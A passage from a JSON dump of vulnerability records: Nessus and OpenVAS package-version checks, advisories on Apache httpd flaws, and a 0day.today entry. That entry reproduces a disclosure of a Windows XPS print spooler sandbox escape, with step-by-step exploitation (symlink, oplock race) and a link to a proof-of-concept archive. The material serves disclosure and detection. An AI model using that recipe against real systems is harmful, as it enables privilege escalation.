value:\"https://access.redhat.com/security/cve/cve-2016-8743\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:0906\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"httpd-2.4.6-45.el7_3.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"httpd-2.4.6-45.el7_3.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"httpd-debuginfo-2.4.6-45.el7_3.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"httpd-debuginfo-2.4.6-45.el7_3.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"httpd-devel-2.4.6-45.el7_3.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"httpd-devel-2.4.6-45.el7_3.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"httpd-manual-2.4.6-45.el7_3.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"httpd-tools-2.4.6-45.el7_3.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"httpd-tools-2.4.6-45.el7_3.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"mod_ldap-2.4.6-45.el7_3.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"mod_ldap-2.4.6-45.el7_3.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"mod_proxy_html-2.4.6-45.el7_3.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"mod_proxy_html-2.4.6-45.el7_3.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"mod_session-2.4.6-45.el7_3.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"mod_session-2.4.6-45.el7_3.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"mod_ssl-2.4.6-45.el7_3.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"mod_ssl-2.4.6-45.el7_3.4\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "zdt": [{"lastseen": "2018-03-20T01:22:35", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2018-01-09T00:00:00", "published": "2018-01-09T00:00:00", "href": "https://0day.today/exploit/description/29406", "id": "1337DAY-ID-29406", "title": "Microsoft Windows - Local XPS Print Spooler Sandbox Escape Exploit", "type": "zdt", "sourceData": "Windows: Local XPS Print Spooler Sandbox Escape\r\nPlatform: Windows 10 1703 and 1709 (not tested Windows 7 or 8.x)\r\nClass: Elevation of Privilege\r\n \r\nSummary:\r\n \r\nThe local print spooler can be abused to create an arbitrary file from a low privilege application including one in an AC as well as a typical Edge LPAC CP leading to EoP.\r\n \r\nDescription:\r\n \r\nWhen creating an XPS print job it's possible to specify the destination file in the DOC_INFO_1 structure passed to StartDocPrinter. When you call WritePrinter to write to the new printer job the privileged printer spooler service impersonates the caller and ensures that they can write to the target. This should ensure that a sandboxed user can't write to a location they don't have access to normally. Unfortunately the spooler then deletes this file it's created under impersonation and then calls NSecurityLibrary::ElevateIntegrityLevelIfLow to increase the IL of caller's token to Medium level if the token is current Low IL. In a naive sandbox such as IE PM this results in the actual file being written as at Medium IL which would be sufficient for writing to any user controlled location such as the Startup folder. However in an AC sandbox you'd assume this wouldn't help as the AC would still be enforced even if the IL of the token was raised. It seems not, if code raises the IL of the AC token to medium (which requires SeTcbPrivilege) then the kernel also removes all traces of the AC, leaving the final token a normal medium IL user token again. Therefore in both the naive and AC cases there exists a TOCTOU attack where you can get the sandboxed token to write to a folder you control then redirect the write to another location once the token IL is raised.\r\n \r\nThe simplest way of doing this would be your standard symbolic link attacks, fortunately Windows has mitigated all the easy ways of doing such an attack. Unfortunately there's a bug in the handling of NtImpersonateAnonymousToken when running in AC which allows a symlink attack in this specific case. I've submitted the bug in NtImpersonateAnonymousToken as a separate issue. Of course there's no reason to believe that there's no other way of exploiting this issue given enough effort without the bug in NtImpersonateAnonymousToken.\r\n \r\nTo exploit do the following:\r\n \r\n1) Create a fake destination directory in a AC writable directory such as Temp. e.g. if you want to write to c:\\users\\user\\desktop\\hello.txt create %TEMP%\\users\\user\\desktop.\r\n2) Use bug in NtImpersonateAnonymousToken to impersonate the non-AC token and create a new C: drive symlink in the anonymous user's drive map pointing at the temp directory. Note that as this is created inside a sandbox a non-sandboxed caller will NOT follow the symlink.\r\n3) Build a native NT path in Win32 form to the target path via the anonymous token's device map directory and pass to StartDocPrinter in DOC_INFO_1. e.g. \\\\?\\GLOBALROOT\\Sessions\\0\\DosDevices\\00000000-000003E6\\C:\\Users\\user\\desktop\\hello.txt\r\n4) Create the \"fake\" target file in the temp directory and put an exclusive oplock on it.\r\n5) Call WritePrinter in another thread, in original thread wait for the oplock to complete. The open in the print spooler will follow the symlink in this case as it's impersonating the sandboxed token.\r\n6) Delete the symlink and break the oplock, this allows the spooler to continue.\r\n7) The spooler now impersonates the medium user token and tried to open the path. The C: symlink created in 2 now no longer exists, however as we're using a device map directory then the global devicemap fallback will kick in so that the spooler sees the global C: drive.\r\n8) The spooler writes arbitrary data to the new target file outside of the sandboxed area.\r\n \r\nI really don't get why the token is elevated before writing the file. There is a mode where if you don't specify a path then the spooler will write the file to the local documents directory. As the sandboxed application has no control of the path it at least makes some sense to elevate to allow the file to be written but when writing an explicit path it seems unnecessary. Note that this also works from LPAC, at least as implemented for Edge CP's. This is because the ALPC port of the spooler has an ACE with the \u201clpacPrinting\u201d capability which is in the list of capabilities in most (all?) CP's for Edge. I also note that WDAG supports writing XPS files, but I don\u2019t have the time to work out the details of how WDAG works right now to see if it would also be vulnerable.\r\n \r\nProof of Concept:\r\n \r\nI\u2019ve provided a PoC as a C# project. The PoC will drop the file hello.txt to the current user\u2019s desktop with arbitrary contents. The PoC will respawn itself as the Microsoft Edge AC and then execute the exploit. You must run this as a UAC split token admin. Note that this ISN\u2019T a UAC bypass, just that a split-token admin has a trivial way of getting a non-AC token by requesting the linked token. The PoC will execute just using a normal AC, to test with LPAC pass the executable any argument you like, the LPAC capabilities are copied from an Edge CP so should be representative of what\u2019s available in real life. It seems on some systems the .NET framework directory has an incorrect DACL which results in the LPAC mode failing. A fresh install of 1709 should work though.\r\n \r\n1) Compile the C# project. It will need to grab the NtApiDotNet from NuGet to work. Ensure the main executable and DLLs are in a user writable location (this is needed to tweak the file permissions for AC).\r\n2) Execute the PoC as normal user level split-token admin.\r\n3) Once complete a dialog should appear indicating the operation is Done.\r\n \r\nExpected Result:\r\nWriting to a file outside of a sandbox accessible directory should fail.\r\n \r\nObserved Result:\r\nThe file hello.txt is created in the current user\u2019s desktop directory with arbitrary contents.\r\n \r\nMicrosoft have made the decision that as the issue with NtImpersonateAnonymousToken (https://bugs.chromium.org/p/project-zero/issues/detail?id=1414) is now fixed then you can no longer exploit this issue. I disagree with this assessment as there's always scope for new ways of getting similar symbolic link like functionality. The printer APIs allow passing an arbitrary Win32 path which doesn't seem to get translated so there's plenty of scope for abuse. You can also still exploit it from a low-IL sandbox as you can still get access to the anonymous token's dos device directory, however MS don't really consider that a security boundary.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43465.zip\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/29406"}], "cve": [{"lastseen": "2018-04-26T07:23:34", "bulletinFamily": "NVD", "description": "In Apache HTTP Server versions 2.4.0 to 2.4.23, mod_session_crypto was encrypting its data/cookie using the configured ciphers with possibly either CBC or ECB modes of operation (AES256-CBC by default), hence no selectable or builtin authenticated encryption. This made it vulnerable to padding oracle attacks, particularly with CBC.", "modified": "2018-04-24T21:29:00", "published": "2017-07-27T17:29:00", "id": "CVE-2016-0736", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0736", "title": "CVE-2016-0736", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "openvas": [{"lastseen": "2019-03-14T14:22:36", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-05-10T00:00:00", "id": "OPENVAS:1361412562310843156", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843156", "title": "Ubuntu Update for apache2 USN-3279-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for apache2 USN-3279-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843156\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 06:53:55 +0200 (Wed, 10 May 2017)\");\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-8743\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for apache2 USN-3279-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apache2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that the Apache\nmod_session_crypto module was encrypting data and cookies using either CBC or\nECB modes. A remote attacker could possibly use this issue to perform padding\noracle attacks. (CVE-2016-0736)\n\nMaksim Malyutin discovered that the Apache mod_auth_digest module\nincorrectly handled malicious input. A remote attacker could possibly use\nthis issue to cause Apache to crash, resulting in a denial of service.\n(CVE-2016-2161)\n\nDavid Dennerline and R&#233 gis Leroy discovered that the Apache HTTP Server\nincorrectly handled unusual whitespace when parsing requests, contrary to\nspecifications. When being used in combination with a proxy or backend\nserver, a remote attacker could possibly use this issue to perform an\ninjection attack and pollute cache. This update may introduce compatibility\nissues with clients that do not strictly follow HTTP protocol\nspecifications. A new configuration option 'HttpProtocolOptions Unsafe' can\nbe used to revert to the previous unsafe behaviour in problematic\nenvironments. (CVE-2016-8743)\");\n script_tag(name:\"affected\", value:\"apache2 on Ubuntu 16.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3279-1\");\n script_xref(name:\"URL\", value:\"https://www.ubuntu.com/usn/usn-3279-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|16\\.10|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.7-1ubuntu4.14\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.18-2ubuntu4.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.18-2ubuntu3.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-03-11T14:35:39", "bulletinFamily": "scanner", "description": "Check the version of httpd", "modified": "2019-03-08T00:00:00", "published": "2017-04-14T00:00:00", "id": "OPENVAS:1361412562310882692", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882692", "title": "CentOS Update for httpd CESA-2017:0906 centos7", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2017:0906 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882692\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-14 06:30:21 +0200 (Fri, 14 Apr 2017)\");\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-8743\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for httpd CESA-2017:0906 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of httpd\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The httpd packages provide the Apache HTTP\nServer, a powerful, efficient, and extensible web server.\n\nSecurity Fix(es):\n\n * It was discovered that the mod_session_crypto module of httpd did not use\nany mechanisms to verify integrity of the encrypted session data stored in\nthe user's browser. A remote attacker could use this flaw to decrypt and\nmodify session data using a padding oracle attack. (CVE-2016-0736)\n\n * It was discovered that the mod_auth_digest module of httpd did not\nproperly check for memory allocation failures. A remote attacker could use\nthis flaw to cause httpd child processes to repeatedly crash if the server\nused HTTP digest authentication. (CVE-2016-2161)\n\n * It was discovered that the HTTP parser in httpd incorrectly allowed\ncertain characters not permitted by the HTTP protocol specification to\nappear unencoded in HTTP request headers. If httpd was used in conjunction\nwith a proxy or backend server that interpreted those characters\ndifferently, a remote attacker could possibly use this flaw to inject data\ninto HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\n\nNote: The fix for the CVE-2016-8743 issue causes httpd to return '400 Bad\nRequest' error to HTTP clients which do not strictly follow HTTP protocol\nspecification. A newly introduced configuration directive\n'HttpProtocolOptions Unsafe' can be used to re-enable the old less strict\nparsing. However, such setting also re-introduces the CVE-2016-8743 issue.\n\nBug Fix(es):\n\n * When waking up child processes during a graceful restart, the httpd\nparent process could attempt to open more connections than necessary if a\nlarge number of child processes had been active prior to the restart.\nConsequently, a graceful restart could take a long time to complete. With\nthis update, httpd has been fixed to limit the number of connections opened\nduring a graceful restart to the number of active children, and the\ndescribed problem no longer occurs. (BZ#1420002)\n\n * Previously, httpd running in a container returned the 500 HTTP status\ncode (Internal Server Error) when a connection to a WebSocket server was\nclosed. As a consequence, the httpd server failed to deliver the correct\nHTTP status and data to a client. With this update, httpd correctly handles\nall proxied requests to the WebSocket server, and the described problem no\nlonger occurs. (BZ#1429947)\n\n * In a configuration using LDAP authentication with the mod_authnz_ldap\nmodule, the name set using the AuthLDAPBindDN directive was not correctly\nused to bind to the LDAP server for all queries. Consequently,\nauthorization attempts failed. The LDAP modules have been fixed to ensure\nthe configured name is correctly bound for LDAP queries, and authorization\nusing LDAP no longer fails. (BZ#1420047)\");\n script_tag(name:\"affected\", value:\"httpd on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:0906\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-April/022380.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.4.6~45.el7.centos.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.4.6~45.el7.centos.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.4.6~45.el7.centos.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.4.6~45.el7.centos.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ldap\", rpm:\"mod_ldap~2.4.6~45.el7.centos.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_proxy_html\", rpm:\"mod_proxy_html~2.4.6~45.el7.centos.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_session\", rpm:\"mod_session~2.4.6~45.el7.centos.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.4.6~45.el7.centos.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "ubuntu": [{"lastseen": "2019-04-14T06:59:58", "bulletinFamily": "unix", "description": "It was discovered that the Apache mod_session_crypto module was encrypting data and cookies using either CBC or ECB modes. A remote attacker could possibly use this issue to perform padding oracle attacks. (CVE-2016-0736)\n\nMaksim Malyutin discovered that the Apache mod_auth_digest module incorrectly handled malicious input. A remote attacker could possibly use this issue to cause Apache to crash, resulting in a denial of service. (CVE-2016-2161)\n\nDavid Dennerline and R\u00c3\u00a9gis Leroy discovered that the Apache HTTP Server incorrectly handled unusual whitespace when parsing requests, contrary to specifications. When being used in combination with a proxy or backend server, a remote attacker could possibly use this issue to perform an injection attack and pollute cache. This update may introduce compatibility issues with clients that do not strictly follow HTTP protocol specifications. A new configuration option \u201cHttpProtocolOptions Unsafe\u201d can be used to revert to the previous unsafe behaviour in problematic environments. (CVE-2016-8743)", "modified": "2017-05-09T00:00:00", "published": "2017-05-09T00:00:00", "id": "USN-3279-1", "href": "https://usn.ubuntu.com/3279-1/", "title": "Apache HTTP Server vulnerabilities", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "redhat": [{"lastseen": "2018-12-11T21:42:23", "bulletinFamily": "unix", "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. The httpd24 packages provide a recent stable release of version 2.4 of the Apache HTTP Server, along with the mod_auth_kerb module.\n\nThe httpd24 Software Collection has been upgraded to version 2.4.25, which provides a number of bug fixes and enhancements over the previous version. For detailed changes, see the Red Hat Software Collections 2.4 Release Notes linked from the References section. (BZ#1404778)\n\nSecurity Fix(es):\n\n* It was discovered that the mod_session_crypto module of httpd did not use any mechanisms to verify integrity of the encrypted session data stored in the user's browser. A remote attacker could use this flaw to decrypt and modify session data using a padding oracle attack. (CVE-2016-0736)\n\n* A denial of service flaw was found in httpd's mod_http2 module. A remote attacker could use this flaw to block server threads for long times, causing starvation of worker threads, by manipulating the flow control windows on streams. (CVE-2016-1546)\n\n* It was discovered that the mod_auth_digest module of httpd did not properly check for memory allocation failures. A remote attacker could use this flaw to cause httpd child processes to repeatedly crash if the server used HTTP digest authentication. (CVE-2016-2161)\n\n* It was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\n\nNote: The fix for the CVE-2016-8743 issue causes httpd to return \"400 Bad Request\" error to HTTP clients which do not strictly follow HTTP protocol specification. A newly introduced configuration directive \"HttpProtocolOptions Unsafe\" can be used to re-enable the old less strict parsing. However, such setting also re-introduces the CVE-2016-8743 issue.\n\n* A vulnerability was found in httpd's handling of the LimitRequestFields directive in mod_http2, affecting servers with HTTP/2 enabled. An attacker could send crafted requests with headers larger than the server's available memory, causing httpd to crash. (CVE-2016-8740)", "modified": "2018-06-13T01:28:27", "published": "2017-04-26T13:54:23", "id": "RHSA-2017:1161", "href": "https://access.redhat.com/errata/RHSA-2017:1161", "type": "redhat", "title": "(RHSA-2017:1161) Moderate: httpd24-httpd security, bug fix, and enhancement update", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "centos": [{"lastseen": "2018-08-31T02:08:44", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2017:0906\n\n\nThe httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nSecurity Fix(es):\n\n* It was discovered that the mod_session_crypto module of httpd did not use any mechanisms to verify integrity of the encrypted session data stored in the user's browser. A remote attacker could use this flaw to decrypt and modify session data using a padding oracle attack. (CVE-2016-0736)\n\n* It was discovered that the mod_auth_digest module of httpd did not properly check for memory allocation failures. A remote attacker could use this flaw to cause httpd child processes to repeatedly crash if the server used HTTP digest authentication. (CVE-2016-2161)\n\n* It was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\n\nNote: The fix for the CVE-2016-8743 issue causes httpd to return \"400 Bad Request\" error to HTTP clients which do not strictly follow HTTP protocol specification. A newly introduced configuration directive \"HttpProtocolOptions Unsafe\" can be used to re-enable the old less strict parsing. However, such setting also re-introduces the CVE-2016-8743 issue.\n\nBug Fix(es):\n\n* When waking up child processes during a graceful restart, the httpd parent process could attempt to open more connections than necessary if a large number of child processes had been active prior to the restart. Consequently, a 